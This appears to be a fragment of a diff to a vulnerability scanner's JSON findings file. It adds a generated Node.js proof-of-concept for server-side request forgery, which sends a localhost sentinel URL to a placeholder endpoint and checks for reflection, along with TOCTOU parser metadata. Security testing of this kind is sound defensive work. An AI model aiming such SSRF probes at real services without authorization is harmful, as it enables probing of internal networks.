+ "code": "// Demonstrates SSRF by forcing the server to fetch a localhost sentinel URL.\n// Endpoint: POST http://localhost:3000/REPLACE-WITH-ENDPOINT\n// Payload: http://127.0.0.1:65533/poc-ssrf-sentinel\n// Expect: sentinel server logs a request from the target — proves the target made an outbound call we controlled\n// Run: node poc.mjs\n// Exit code: 0 = exploit demonstrated, 1 = not demonstrated, 2 = error\n\nconst URL_ = \"http://localhost:3000/REPLACE-WITH-ENDPOINT\";\nconst METHOD = \"POST\";\nconst PAYLOAD = `http://127.0.0.1:65533/poc-ssrf-sentinel`;\n\nconst body = METHOD === 'GET'\n ? null\n : JSON.stringify({ \"input\": PAYLOAD });\n\nconst headers = { 'Content-Type': 'application/json' };\n\nconst reqUrl = METHOD === 'GET'\n ? URL_ + (URL_.includes('?') ? '&' : '?') + \"input\" + '=' + encodeURIComponent(PAYLOAD)\n : URL_;\n\ntry {\n const r = await fetch(reqUrl, { method: METHOD, headers, body, redirect: 'follow' });\n const text = await r.text();\n const sig = (text.includes(\"http://127.0.0.1:65533/poc-ssrf-sentinel\") ? 'payload reflected' : '');\n if (sig) {\n process.stderr.write('PoC: exploit demonstrated — ' + sig + '\\n');\n process.exit(0);\n }\n process.stderr.write('PoC: payload sent (status ' + r.status + '), no exploit evidence in response\\n');\n process.exit(1);\n} catch (e) {\n process.stderr.write('PoC: error reaching target — ' + e.message + '\\n');\n process.exit(2);\n}\n",
50284
+ "paramKey": null,
50285
+ "paramKeyConfidence": "low",
50286
+ "paramKeyInferred": false
49967
50287
  },
49968
50288
  "calibrated_confidence": null,
49969
50289
  "calibrated_confidence_ci": null,
@@ -50191,6 +50511,7 @@
50191
50511
  "unvalidated": true,
50192
50512
  "cross_language": false,
50193
50513
  "family": "toctou-file-existence-permission-check-b",
50514
+ "parser": "TOCTOU",
50194
50515
  "_unsigned": false,
50195
50516
  "_passThroughSigning": false,
50196
50517
  "signatureStatus": "verified",
@@ -50413,6 +50734,7 @@
50413
50734
  "unvalidated": true,
50414
50735
  "cross_language": false,
50415
50736
  "family": "toctou-file-existence-permission-check-b",
50737
+ "parser": "TOCTOU",
50416
50738
  "_unsigned": false,
50417
50739
  "_passThroughSigning": false,
50418
50740
  "signatureStatus": "verified",
@@ -51235,5 +51557,6 @@
51235
51557
  "alarms": [],
51236
51558
  "note": "no-feedback-data"
51237
51559
  }
51238
- }
51560
+ },
51561
+ "annotatorErrors": []
51239
51562
  }